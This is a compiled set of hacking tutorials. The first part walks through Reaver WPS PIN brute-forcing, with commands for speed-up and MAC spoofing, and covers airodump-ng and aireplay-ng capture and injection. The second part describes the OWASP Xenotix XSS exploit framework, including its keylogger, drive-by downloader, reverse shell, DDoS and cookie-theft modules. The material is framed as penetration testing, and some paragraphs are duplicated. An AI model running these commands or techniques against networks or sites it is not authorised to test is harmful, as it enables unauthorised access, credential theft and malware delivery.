Reaver WPS Hacking Tutorial Explained

Prerequisites

You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.

Basic Usage

First, make sure your wireless card is in monitor mode:# airmon-ng start wlan0
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually ‘mon0′, not ‘wlan0′, although this will vary based on your wireless card/drivers):# reaver -i mon0 -b 00:01:02:03:04:05
You will probably also want to use -vv to get verbose info about Reaver’s progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Speeding Up the Attack
By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding ‘-d 0′ on the command line, but some APs may not like it:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Another option that can speed up an attack is –dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv –dh-small
MAC Spoofing
In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the –mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card’s physical interface. For example:
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv –mac=00:BA:AD:BE:EF:69
Default Pins
It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.
Errors and Warnings
It is not uncommon to get a few errors or warnings during the attack, usually related to receive timeouts or out of order WPS messages. You may even get these warnings for a few minutes until the pin count starts incrementing again.
However, if your pin count does not increment at all, or increments only occasionally with lots of errors/warnings, answer the following:
Does the target AP support WPS and is WPS enabled?
Did you put your wireless card into monitor mode?
Did you specify the monitor mode interface with the -i option?
Do you have a good signal from the AP?
If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include:
Linux distro, distro version, and architecture (32 bit or 64bit?)
Wireless card and driver
Pcap file demonstrating the issue, if possible

Airodump-ng Explained in Detail.

Airodump-ng Usage
Airodump-ng has the following usage:
airodump-ng <options><interface name>
Airodump-ng has many different options and we will be covering aa great many of them through this tutorial. Some of the most common options are:



Prior to running Airodump-ng, your wireless card needs to be in monitor mode. Then, to run a basic sniffing session, the only parameter that neesd to be passed is the wireless interface name.
airodump-ng <inteface name>
Once Airodump-ng is launched, you will see somthing similar to this:

This may be confusing  but it is really easy to understand.
Airodump-ng breakdown:
As you have seen, Airodump-ng presents a wealth of information while it is running its
capture. The top line of the display, beginning at the left, shows the current channel,
followed by the elapsed sniffing time, the current date and time, and interestingly, an
indication that a WPA handshake was captured. The significance of this will be covered
later but what this means is that a 4-way WPA handshake was captured for the access point
with the BSSID of C8:BC:C8:FE:D9:65.
The Airodump output is separated into 2 separate sections. The top portion provides
information about the access points that have been detected along with the encryption in
use, network names, etc.
In the lower portion of the output, the BSSID column contains the MAC addresses of the
detected access points with the STATION column containing the MAC addresses of the
connected clients.
The table below contains descriptions of all of the Airodump fields.



If you are in an area with many other access points, your Airodump display and capture
files will become very cluttered with unwanted data. After doing your initial
reconnaissance, you can determine the BSSID of the access point and the channel it’s
transmitting on and zero in on it specifically.
To sniff the data of an AP on channel 3 with the BSSID of 34:08:04:09:3D:38, you would
first place your card in monitor mode on channel 3.



Now, you can launch Airodump-ng with some advanced filtering options to sniff only the
traffic for the AP you are interested in by using the following syntax:
airodump-ng -c <Channel> –bssid <BSSID> -w <Capture><interface name>


As can be seen in the above Airodump output, filtering for a specific access point can make
for a much more manageable display and will keep your capture files to a reasonable size.
To further minimize the disk space used by the file capture, you can also include the ‘–
ivs’ option.
airodump-ng -c <Channel> –bssid <BSSID> -w <Capture> –ivs <interface name>
This flag stores only the weak initialization vectors and not the full packet. An important
point to keep in mind is that the ‘–ivs’ flag should NOT be used if you are attempting to
capture a WPA/WPA2 handshake or if you want to use the PTW attack against WEP.
No APs or Clients are Shown
• If you have a laptop with a built-in wireless card, ensure it is enabled in the BIOS.
• Make sure your card works in managed mode.
• Try unloading the driver with rmmod and reloading it with modprobe.
Little or No Data Being Captured
• Ensure that you have used the -c or –channel option to specify a single channel.
Otherwise, Airodump-ng will hop between the different channels.
• You might need to be physically closer to the AP to get a good quality signal.
• Ensure that you have started your wireless card in monitor mode with Airmon-ng.
• If you are using a Madwifi-ng driver, make sure that there are no other VAPs
running. There can be issues when creating a new VAP in monitor mode if there is an existing VAP in managed mode.

Aireplay-ng Explained in detail

Aireplay-ng is primarily used to generate or accelerate wireless traffic for the later use with
Aircrack-ng to crack WEP and WPA-PSK keys.
Aireplay-ng supports various attacks such as
deauthentication (for the purpose of capturing the 4-way WPA handshake), fake
authentication, interactive packet replay, and more.
Aireplay-ng supports the following attacks along with their
corresponding numbers:

This section provides a general usage overview as not all options apply to all attacks. See
the command options of the specific attack you wish to use for the relevant details.
aireplay-ng <options><interface name>
For all attacks, with the exception of deauthentication and fake authentication, you may use
the following filters to limit the packets that will be used in the attack. The most commonly
used filter option is ‘-b’ to single out a specific AP.

When replaying (injecting) packets, the following options apply. Bear in mind that not
every option is relevant for every attack. The specific attack documentation provides
examples of the relevant options.

The Aireplay-ng attacks can obtain packets from two sources. The first source is a live flow
of packets from your wireless card whereas the second source is from a pre-captured pcap
file. The standard pcap format (http://www.tcpdump.org) is recognized by most
commercial and open-source traffic capture and analysis tools. Reading from a file is an
often-overlooked feature of Aireplay-ng.

The following attack modes are specified with the following switches. Numbers can be used
instead of the attack names.


The following troubleshooting tips apply to all modes of Aireplay-ng.
Aireplay-ng does not Inject Packets
Ensure that you are using the correct monitor mode interface. Running ‘iwconfig’ will
show the wireless interfaces and their states. For devices using mac80211 drivers, the
monitor mode interface is typically named mon0. For users of madwifi-ng drivers, ensure
that there are no other VAPs running.
Aireplay-ng Hangs with No Output
If you enter the command and it appears to hang with no output, this is typically due to
your wireless card being on a different channel number than the access point.
Also, if you have another instance of Aireplay-ng running in background mode, this can
cause the second command to hang if the options conflict.
Aireplay-ng “write failed: Cannot allocate memory wi_write(): illegal seek”
When using a wireless card with a Broadcom chipset, you may encounter this bug found in
the original bcm43xx patch. You can try using the b43 driver instead of bcm43xx.
Aireplay-ng has Slow Injection “rtc: lost some interrupts at 1024Hz”
If you see that you are injecting packets successfully but very slowly, at around 30 packets
per second, and receive the kernel message “rtc: lost some interrupts at 1024Hz”, there is
no fix other than to start another instance of Aireplay, which should increase the injection
rate.

Injection Test Usage
The injection test has the following usage:
aireplay-ng -9 -e <ESSID> -a <AP MAC> -i <interface><interface name>
Where:
• -9: injection test
• -e: optional ESSID (network name)
• -a: optional AP MAC address
• -i: optional interface name for the two card injection test
• <interface name>: the interface name to use for the test
Important: You must set your card to the desired channel with Airmon-ng prior to running
any of the tests.
The basic injection test determines if your card successfully supports injection. As
mentioned earlier, the wireless card must first be in monitor mode:

Next, the basic injection test is launched using the following syntax:
aireplay-ng -9 <interface name>

Injection Test Results Analysis
• 12:02:10 Injection is working!:
This confirms that the wireless card can inject
• 12:02:11 Found 2 APs:
These APs were found either through the broadcast probes
or received beacons
12:02:12 34:08:04:09:3D:38 – channel: 3 – ‘em3rgency’: The first AP being tested
12:02:13 Ping (min/avg/max): 1.455ms/4.163ms/12.006ms Power: -37.63: the ping times are calculated
12:02:13 30/30: 100%: The pings had a 100% success rate for the AP
12:02:13 C8:BC:C8:FE:D9:65 – channel: 2 – ‘secnet’: Notice that this AP is on channel 2.

OWASP Xenotix XSS Exploit Framework v3 2013

OWASP Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. It is basically a payload list based XSS Scanner and XSS Exploitation kit. The exploitation framework will help the penetration testers to create proof of concept attacks on vulnerable web applications.
 
Project Leader(s): Ajin Abraham
Download : https://www.owasp.org/image/3/3d/OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip

Introduction

Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s. XSS got listed as the top 3^rd Vulnerability in the OWASP 2013 Web application Vulnerabilities list. Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications which allows the attackers to inject client-side script into web pages viewed by other users. The execution of the injected code takes place at client side. A cross site scripting vulnerability can be used by the attacker to bypass the Same Origin Policy (SOP). In the past, the potentials of XSS vulnerability were not known. XSS was mainly used for stealing cookies and for temporary or permanent defacements and was not considered as high risk vulnerability. But later XSS tunneling and Payload delivering showed us the potential of XSS Vulnerability. Most of the large websites like Google, Facebook, Twitter, Microsoft, and Amazon etc. even now suffers from XSS bugs. That’s a brief introduction about XSS. 

Some threats due to XSS

XSS Tunneling: With XSS Tunnel a hacker will obtain the traffic between the victim and a webserver.

Client side code injection: A hacker can inject malicious codes and execute them at client side.

DOS: A hacker can perform DOS against a remote server or against the client itself.

Cookie Stealing: A hacker can obtain the session cookies or tokens of a victim.

Malware Spreading: A hacker can spread malwares with a website which is vulnerable to XSS.

Phishing: A hacker can embed or redirect to a fake page of the website to get the login credentials of the victim.

Defacing: Temporary or permanent defacement of web application is possible.

What is Xenotix XSS Exploit Framework?

Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications.This tool can inject codes into a webpage which are vulnerable to XSS.It is basically a payload list based XSS Scanner and XSS Exploitation kit. It provides a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both manual mode and automated time sharing based test modes. The exploitation framework in the tool includes a XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader, a XSS Reverse Shell and a XSS DDoSer. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.

Features of Xenotix XSS Exploit Framework

Xenotix XSS Exploit Framework is divided into two module

 Scanner Module

• Built in XSS Payloads
• HTML5 compactable Payload list
• XSS Auto mode Scanner
• XSS Multi-Parameter Scanner
• XSS Fuzzer

Exploitation Framework

• XSS Keylogger
• XSS Executable Drive-by downloader
• XSS Payload Encoder
• XSS Reverse Shell
• XSS DDoSer
• XSS Cookie Thief

Scanner Module

Built in Payload List

It is having an inbuilt XSS payload list of above 500+ XSS payloads. It includes HTML5 compactable XSS injection payloads.Most of the XSS filters are implemented using String Replace filter, htmlentities filter and htmlspecialcharacters filter. Most of these weakly designed filters can be bypassed by specific XSS payloads present in the inbuilt payload list.

The above chart shows the number of XSS Payloads in different XSS Scanning tools available in market. Xenotix XSS Exploit Framework got the world’s second largest XSS Payload list after IBM AppScan Security which is having 700 million payloads.

XSS Scanner Module

XSS Multi-Parameter Scanner

The Multi-Parameter XSS Scanner comes when you have multiple parameters to test for XSS. It can extract the different parameters from the given URL and test them individually. It saves a lot of your time as you don’t need to test each parameter separately.

XSS Fuzzer

The XSS Fuzzer is a convenient module to detect hidden XSS as well as other vulnerabilities like HTTP Parameter Polution. With the Fuzzer, one can conduct an out of the box testing of the box fuzzing to detect hidden vulnerabilities in a web application.

2. Exploitation Framework

XSS KeyloggerThe XSS Fuzzer is a convenient module to detect hidden XSS as well as other vulnerabilities like HTTP Parameter Polution. With the Fuzzer, one can conduct an out of the box testing of the box fuzzing to detect hidden vulnerabilities in a web application. 

The tool includes an inbuilt victim side Key logger which is implemented using JavaScript and PHP.  PHP is served with the help of a portable PHP server named QuickPHP by Zach Saw. A JavaScript file is injected into the web application vulnerable to XSS and is presented to the victim. The script captures the keystrokes made by the victim and send to a PHP file which further write down the logs into a text file.

XSS Executable Drive-by Downloader

Java Drive-by download can be implemented with Xenotix XSS Exploit Framework. It allows the attacker to download and run a malicious executable file on the victim’s system without his knowledge and permission. 
You have to specify the URL for the malicious executable and then embed the drive-by implemented webpage into a XSS vulnerable page and serve your victim. When the victim view the injected page, the java applet client.jar will access the command prompt and with the help of echo command, write down some scripts to a Visual basic script file named winconfig.vbs in the temp directory(%temp%) and then the cmd.exe will start winconfig.vbs. The winconfig.vbs will download the malicious executable specified by you in the URL to temp directory and rename it as update.exe and finally it will execute update.exe. The downloading and executing of the malicious executable happened without the knowledge and permission of the victim.

XSS Payload Encoder

The inbuilt Encoder will allow encoding into different forms to bypass various filters and Web Application Firewalls. The encoder supports Base64 Encoding, URL Encoding, HEX Encoding, HTML Characters Conversion, Character Code Conversion and IP to Dword, Hex and Octal conversions.

XSS Reverse Shell

A XSS Reverse Shell can be implemented with Xenotix XSS Exploit Framework. This is made possible with the help of Java Drive-By. The XSS vulnerable web application exploited with the injectable scripts generated by XSS Reverse Shell when presented to a victim will initiate the drive by download of a Reverse TCP connecting shell. After the drive-by download, the reverse shell is executed by the same method used in Java Drive-by.

The advantage of this method is that the reverse shell is downloaded and executed in the victim’s system without his knowledge. But for the execution of reverse shell, it will pop up a UAC dialog requesting for the permission to run the executable. The tool is having an inbuilt Listener that listens to the reverse shell. It is designed in a user friendly manner. All you have to do is to specify the reverse connection IP and port. 

XSS DDoSer

With HTML 5 comes great power. We harvest the power of HTML 5 to abuse the Cross Origin Resource Sharing (CORS) and WebSocket to implement a DDoS attack.  
WebSocket is a technology that allows web applications to have a bidirectional channel to a URI endpoint. Sockets can send and receive data to and from a web server and respond to opening or closing a WebSocket. The XMLHttpRequest is a JavaScript object which is used to exchange data between a server and a bowser behind the scene. This can be used for Cross Origin Resource Sharing (CORS). We can perform a combined and powerful DDoS attack by abusing these two technologies. This module abuses WebSocket and creates numerous socket connections with a target server to slow it down. Along with it by abusing CORS, the add-on create numerous fake GET requests to slow down the target server. When we send the first request to the target server and the response contains the 'Access-Control-Allow-Origin' header with a value that restricts cross site requests, then at times the browser refuses to send more requests to the same URL. However this can be easily bypassed by making every request unique by adding a non-existing query-string parameter with changing values.

XSS Cookie Thief

It’s the traditional Cookie Stealer but a bit advanced and with real time cookie viewer. This module allows the pentester to create cookie stealing POC.

Features for the Next Build

Current version of XSS Exploit Framework is based on Internet Explorer’s webpage rendering engine Trident. Since XSS got slightly different behavior in different Web Browsers, the support for the Gecko (Used by Mozilla Firefox) and Webkit (used by Chrome, Opera, and Safari) Rendering engines will be added up in the next build. The support for XSS in POST Parameter and XSS testing by modifying the headers will be included in the next build. XSS Proxy to tunnel the victim-server traffic will be added in future builds. Automatic detection of parameters or variables vulnerable against XSS and DOM Based XSS detection will be added up in next build.

Conclusion

XSS in popular website is a high security threat. Xenotix XSS Exploit Framework can be used by Security Analysts to perform penetration test on Web Applications against XSS vulnerability and to create POC with the inbuilt exploitation framework. Most of the security tools related to XSS are either XSS Scanners or XSS Exploitation tools. Xenotix XSS Exploitation Framework is the first of its kind to act both as an XSS vulnerability scanner as well as XSS exploitation framework. Bug bounty programs like Google Vulnerability Reward Program, Facebook Bounty, Paypal bug bountyetc. are there. So go for a XSS hunting and grab your bounty.J

About Author

Ajin Abraham is an Information Security Researcher. He is the creator of OWASP Xenotix XSS Exploit Framework. He had published different whitepapers and tools in the scope of Information Security. He is one among the top 10 in Chakravyuh 2012, India’s Biggest Ethical Hacking Competition. His area of interest includes web application penetration testing, coding tools, exploit development and fuzzing. He has been a speaker at many security conferences including Defcon Bangalore-India 2012, ClubHack 2012, nullcon Goa 2013, AppSec APAC 2013, Hack Miami 2013, BlackHat Europe 2013 and many more.